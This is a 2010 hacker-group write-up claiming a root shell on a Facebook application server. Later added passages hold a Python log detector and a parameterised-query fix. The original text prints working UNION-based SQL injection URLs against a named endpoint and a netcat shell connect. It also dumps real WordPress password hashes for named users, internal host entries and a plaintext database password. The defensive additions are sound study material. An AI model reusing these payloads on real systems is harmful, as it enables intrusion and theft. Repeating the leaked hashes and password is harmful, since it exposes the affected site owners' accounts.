facebookpa-sql.txt
Posted on 20 July 2010
====================================================
FaceBook's servers were hacked again by Inj3ct0r Team
====================================================

Part 1 Original: http://inj3ct0r.com/exploits/11638
Part 2 Original: http://inj3ct0r.com/exploits/13403

[+] English translation

Inj3ct0r official website => Inj3ct0r.com
Inj3ct0r community => 0xr00t.com

[0x00] [Introduction]
[0x01] [Search for bugs / crash]
[0x02] [0wner]
[0x03] [Conclusion]
[0x04] [Greetz]


[0x00] [Introduction]

In this log file you will read a limited version of the information gathered and provided, since the most important parts are being kept private in order to be analyzed by the proper authorities and to close the loopholes in the system. We did not change the main page, did not sell the server backup and did not delete files. We have demonstrated the flaw in the system.

Start =] ..

oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
Sir Zaid, personal RESPECT! y0u helped me write the article and find the vulnerabilities
oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo


[0x01] [Search for bugs / crash]

inj3ct0r@host [/home]# ./inj3ct0r.com_0day_Search http://apps.facebook.com
...Search Vulnerabilities . . . . . . . . . .. . . .. . . . ..
[+] found 13 vulns and 6 warning
[+] open 31337 port yes
[+] connect...

Brevity the soul of wit..
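The scan above is the attacker's side of the story. From the server side, the same activity leaves a trail in the web server's access log: every UNION-based request quoted later in the Proofs section is a GET with a query string that no legitimate issue.php visitor would send. The following script is an added example, not part of this write-up and not Inj3ct0r's tool: it parses common-log-format lines, URL-decodes the query string, fires a small set of indicators modelled on the requests quoted on this page (boolean toggle, UNION SELECT, information_schema, fingerprinting functions, hex literals, trailing comment) and decodes the hex literals so an analyst can read what the probe compared against. The log lines are constructed samples, the indicator names and the two-indicator threshold are my own choices.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed sample access-log lines (not from the incident), modelled on the
# issue.php requests quoted in the write-up: two normal requests, two probes.
SAMPLE_LOG = """\
10.0.0.5 - - [20/Jul/2010:10:00:01 +0000] "GET /politicalaction/issue.php?issueid=1 HTTP/1.1" 200 5120
10.0.0.9 - - [20/Jul/2010:10:00:07 +0000] "GET /politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4--+1 HTTP/1.1" 200 5301
10.0.0.9 - - [20/Jul/2010:10:00:12 +0000] "GET /politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,2,3,4,concat(table_schema,0x3a,table_name),6,7,8,9,10+FROM+information_schema.tables+WHERE+table_schema+!=+0x6d7973716c--+1 HTTP/1.1" 200 9870
10.0.0.7 - - [20/Jul/2010:10:00:20 +0000] "GET /politicalaction/issue.php?issueid=2 HTTP/1.1" 200 5100
"""

# Common log format: client, ident, user, [timestamp], "METHOD target PROTO"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*"'
)

# Each indicator is one feature of the UNION-based enumeration seen in the
# Proofs: the predicate that empties the real result set, the UNION itself,
# catalogue access, fingerprinting functions, hex-encoded string literals and
# the trailing comment that discards the rest of the original query.
INDICATORS = {
    "boolean_toggle": re.compile(r"\b(?:and|or)\s+\d+\s*=\s*\d+\b"),
    "union_select": re.compile(r"\bunion\b\s+(?:all\s+)?select\b"),
    "information_schema": re.compile(r"\binformation_schema\b"),
    "fingerprint_funcs": re.compile(r"\b(?:user|database|version)\s*\(\s*\)"),
    "hex_literal": re.compile(r"\b0x(?:[0-9a-f]{2})+\b"),
    "comment_terminator": re.compile(r"--(?:\s|$)"),
}


def decode_hex_literals(text):
    """Turn MySQL-style 0x.. literals back into text so an analyst can see
    what the probe compared against (0x6d7973716c is 'mysql')."""
    decoded = []
    for m in re.finditer(r"\b0x((?:[0-9a-f]{2})+)\b", text):
        decoded.append(bytes.fromhex(m.group(1)).decode("ascii", "replace"))
    return decoded


def classify_query(query):
    """Return the names of the indicators that fire on one raw query string."""
    q = unquote_plus(query).lower()
    return [name for name, rx in INDICATORS.items() if rx.search(q)]


def analyze_log(log_text, min_indicators=2):
    """Parse each line, decode its query string and report requests on which at
    least min_indicators fire; a single indicator alone is too noisy to alert on."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        parts = urlsplit(m.group("target"))
        hits = classify_query(parts.query)
        if len(hits) >= min_indicators:
            findings.append({
                "ip": m.group("ip"),
                "time": m.group("ts"),
                "path": parts.path,
                "indicators": hits,
                "decoded_literals": decode_hex_literals(unquote_plus(parts.query).lower()),
            })
    return findings


if __name__ == "__main__":
    for f in analyze_log(SAMPLE_LOG):
        print(f["time"], f["ip"], f["path"], ", ".join(f["indicators"]), f["decoded_literals"])
```

Run as-is it reports the two probes from 10.0.0.9 and nothing for the normal requests. The decoded literals matter for triage: the second probe excludes the schema named `mysql`, which tells the analyst the request was enumerating every other database the application account could see, so the response size and the account's grants are the next things to check.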
inj3ct0r.com@mybox [~]
inj3ct0r.com@host [~]# cd /home
inj3ct0r@host [/home]# ./inj3ct0r.com_0day http://apps.facebook.com
...attack starting . . . . . . . . . .. . . .. . . . ..


[0x02] [0wner]

Successful Shell on 31337 port . . . . .

inj3ct0r.com@host [/home]# ./nc -v 66.220.153.15 31337
...............................................................
apps.facebook@host [~]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

-[0x33]- Proofs

############
# REQUESTS #
############

;===== BASIC INFO
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4--+1

;===== LIST TABLES
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,2,3,4,concat(table_schema,0x3a,table_name),6,7,8,9,10+FROM+information_schema.tables+WHERE+table_schema+!= 0x6d7973716c+AND+table_schema+!=+0x696e666f726d6174696f6e5f736368656d61--+1

;===== LIST COLUMNS
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,2,3,4,concat(table_schema,0x3a,table_name,0x3a,column_name),6,7,8,9,10+FROM+information_schema.columns+WHERE+table_schema+!= 0x6d7973716c+AND+table_schema+!=+0x696e666f726d6174696f6e5f736368656d61--+1

;===== LIST WORDPRESS USERS/PASS
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,2,3,4,concat(user_login,0x3a,user_pass),6,7,8,9,10+from+candukincaid.wp_users--+1

admin:$P$BQFUeKJK810OT9Y/Hmcx/hZdaRBEmw/
lucia:$P$BqEFbcc1.uPFB8SfIIDcmVq7pc40WK.
tom:$P$BlBjwW.57R/lHuoGLSUyAutopYdoEt/

-----

http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,2,3,4,concat(user_login,0x3a,user_pass),6,7,8,9,10+from+churchwpdb.wp_users--+1

admin:$P$B6RRs18hNYnYWPgNy0brmY/qPg3W7b.
test:$P$BuuuSp.VN0Ha5/p11u20ATdWqeEk

-----

http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,2,3,4,concat(user_login,0x3a,user_pass),6,7,8,9,10+from+luciacanduwp.wp_users--

admin:$P$B1jGLGuDkN6gNT68q92h3RG3wG4qwi/
lucia:$P$BBtUst3KjOqCdTNVVTGdWlgayz

################
# INFORMATIONS #
################

;===== PATH
/home/tomkincaid/tomkincaid.dreamhosters.com/facebookclient/shared_lib.php

;===== BASIC INFO
tomkincaid@ps5008.dreamhost.com politicsapp 5.0.45-log

;===== TABLES
# astro
  ** app ** oscache ** user
# candukincaid
  ** wp_commentmeta ** wp_comments ** wp_links ** wp_options ** wp_postmeta ** wp_posts ** wp_px_albumPhotos ** wp_px_albums ** wp_px_galleries ** wp_px_photos ** wp_px_plugins ** wp_term_relationships ** wp_term_taxonomy ** wp_terms ** wp_usermeta ** wp_users
# cemeteries
  ** AmazonItem ** AmazonType ** CameraType ** Format ** Guestbook ** Links ** Photo ** Scan
# churchwpdb
  ** wp_comments ** eventscalendar_main ** icl_languages ** icl_languages_translations ** icl_locale_map ** icl_translations ** links ** options ** postmeta ** posts ** term_relationships ** term_taxonomy ** terms ** usermeta ** users
# countdownapp
  ** oscache ** user
# crush
  ** couple ** oscache ** user
# dare
  ** flag ** game ** item ** user
# friendiq
  ** oscache ** score ** user
# giants
  ** app ** league ** media ** mediaforuser ** oscache ** post ** team ** topic ** user
# hookup
  ** couple ** neverblue ** oscache ** user
# jauntlet
  ** user
# loccus
  ** checkin ** oscache ** user
# luciacanduwp
  ** wp_comments ** wp_links ** wp_options ** wp_postmeta ** wp_posts ** wp_term_relationships ** wp_term_taxonomy ** wp_terms ** wp_usermeta ** wp_users
# maps
  ** place ** user
# martisor
  ** user
# mediax
  ** oscache ** user
# mostlikely
  ** callback ** statement ** statementforuser ** user
# music
  ** itemforuser ** oscache ** user
# pimpfriends
  ** activity ** ad ** favorite ** gift ** giftforho ** hoforpimp ** johnforho ** oscache ** permission ** photoforuser ** room ** user ** wall ** whistle
# plans
  ** attend ** cache ** event ** place ** user
# politicsapp
  ** app ** badge ** badgeforuser ** issue ** oscache ** position ** positionforuser ** post ** user
# postergifts
  ** category ** categoryproduct ** categoryrelationship ** image ** oscache ** posterforuser ** user
# posters2
  ** category ** categoryproduct ** categoryrelationship ** image ** oscache ** posterforuser ** user
# projectbasecamp
  ** clicktimeproject ** clicktimereport ** clicktimetask ** idcorrelation ** projectbudget ** taskforuser ** user
# pwnfriends
  ** photo ** photoforfriend ** photoforuser ** user
# quiz
  ** app ** question ** quiz ** result ** resultforquestion ** resultforuser ** user
# seeall
  ** network ** networkforuser ** test2 ** userpref
# send
  ** app ** item ** itemforuser ** neverblue ** user
# supporter
  ** oscache ** user
# swapu
  ** item ** itemforuser ** network ** networkforuser ** swaptype ** user
# tomsapps
  ** ad ** adclick ** app ** contest ** notification
# travelbug
  ** bug ** bugcache ** user
# tv
  ** app ** oscache ** post ** series ** seriesforuser ** thread ** threadforuser ** user
# wikitravel
  ** badmap ** wikitravelimage ** wikitravelpage

---------------------------------------------------------------------------------------------------------------------------------------------------

read /etc/hosts

127.0.0.1 localhost localhost.localdomain
192.168.1.167 140696-db2.flufffriends.com 140696-db2
192.168.1.166 140695-db1.flufffriends.com 140695-db1
192.168.1.165 140694-web2.flufffriends.com 140694-web2
192.168.1.164 140693-web1.flufffriends.com 140693-web1
69.63.176.141 api.facebook.com
208.116.17.80 peanutlabs.com

----------------------------------

/etc/my.cnf

#SERVER 5 IS THE MASTER FOR DB1 AND ROMIS FOR DB1
log-bin=/var/lib/mysqllogs/bin-log
binlog-do-db=fluff2
expire-logs-days=14
server-id = 2
#master-host=69.63.180.15
#master-user=tomkincaid_user
#master-password=tomkincaid123
#master-connect-retry=50
replicate-do-db=miserman
#log-slave-updates
expire_logs_days = 14

goOd =] Nice Hacking old school xD


[0x03] [Conclusion]

There's no 100% security! Be safe my friends! Watch for vulnerabilities and promptly update!

Watch for updates on Inj3ct0r.com (Inj3ct0r Exploit Database)


[0x04] [Greetz]

Greetz to all users of Inj3ct0r.com and the 31337 Inj3ct0r Members!

31337 Inj3ct0r Members: cr4wl3r, The_Exploited, eidelweiss, SeeMe, XroGuE, agix, gunslinger_, Sn!pEr.S!Te, indoushka, Sid3^effects, L0rd CrusAd3r, Th3 RDX, r45c4l, Napst3r™, etc..

----------------------------------------------------------------------------------------------

Personally h4x0rz:
Sir Zaid (none)
Dante90 http://inj3ct0r.com/author/916
SONiC http://inj3ct0r.com/author/2545
**RoAd_KiLlEr** http://inj3ct0r.com/author/2447
MasterGipy http://inj3ct0r.com/author/2346

You are good hackers. Respect y0u!

Sir Zaid, thank you for pushing me to write this article and for reporting the vulnerability! Personal Respect to you from Inj3ct0r Team!

Friendly projects: Hack0wn.com, SecurityVulns.com, SecurityHome.eu, Xiya.org, Packetstormsecurity.org.. we have many friends)) Go http://inj3ct0r.com/links =]

At the time of publication, all requests still work!

Attached images: inj3ct0r.com/facebook_part2.zip

We want to thank the following people for their contribution. Do not forget to keep track of vulnerabilities on Inj3ct0r.com

H.A.C.K.T.I.V.I.S.M. WIN! =]
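The requests in the Proofs section work for one reason: issue.php splices the `issueid` parameter into the SQL text, so a value of `1 and 1=2 UNION SELECT ...` empties the real result set and appends rows from whatever table the database account can read. The source of the real issue.php is not on this page; the following is an added example, written for this edit and not the application's code, that shows the defect class beside its fix in Python against an in-memory SQLite database. The schema and rows are constructed (table names `issue` and `wp_users` are borrowed from the listing above, the hashes are placeholders), and `lookup_issue_vulnerable` / `lookup_issue_safe` are hypothetical names.

```python
import sqlite3


def make_db():
    """Constructed in-memory schema loosely modelled on the write-up's table
    listing: an issue table behind issue.php and a WordPress-style users table.
    All rows are sample data; the hashes are placeholders, not real credentials."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE issue (issueid INTEGER, title TEXT);
        CREATE TABLE wp_users (user_login TEXT, user_pass TEXT);
        INSERT INTO issue VALUES (1, 'Health care'), (2, 'Taxes');
        INSERT INTO wp_users VALUES ('admin', '$P$B-placeholder-hash-1'),
                                    ('lucia', '$P$B-placeholder-hash-2');
        """
    )
    return conn


def lookup_issue_vulnerable(conn, issueid):
    """The defect class: the request parameter becomes part of the SQL text,
    so the database parses attacker-controlled text as SQL."""
    sql = f"SELECT issueid, title FROM issue WHERE issueid={issueid}"
    return conn.execute(sql).fetchall()


def lookup_issue_safe(conn, issueid):
    """The fix: validate the expected type, then bind the value as a parameter.
    A bound parameter is data and can never append a UNION to the statement."""
    try:
        iid = int(issueid)
    except (TypeError, ValueError):
        raise ValueError("issueid must be an integer")
    return conn.execute(
        "SELECT issueid, title FROM issue WHERE issueid=?", (iid,)
    ).fetchall()


# Same shape as the write-up's requests: a valid id, a false predicate that
# empties the original result set, then a UNION onto an unrelated table.
PAYLOAD = "1 and 1=2 UNION SELECT user_login, user_pass FROM wp_users"


def demo():
    """Run both lookups against the same payload and a legitimate id."""
    conn = make_db()
    leaked = lookup_issue_vulnerable(conn, PAYLOAD)   # rows from wp_users
    try:
        lookup_issue_safe(conn, PAYLOAD)
        blocked = False
    except ValueError:
        blocked = True                                 # rejected before the DB sees it
    legit = lookup_issue_safe(conn, "1")               # normal request still works
    return {"leaked": sorted(leaked), "blocked": blocked, "legit": legit}


if __name__ == "__main__":
    print(demo())
```

Parameter binding closes the injection, but it is not the only lesson in the listing above. The BASIC INFO line shows the application connecting as `tomkincaid@ps5008.dreamhost.com` to the `politicsapp` database, yet the later requests read `candukincaid.wp_users`, `churchwpdb.wp_users` and `luciacanduwp.wp_users`. One account with grants across every database on the host turned a bug in one small app into a credential dump for several unrelated sites; a per-application account limited to its own schema would have contained the damage to `politicsapp` even with the injection present.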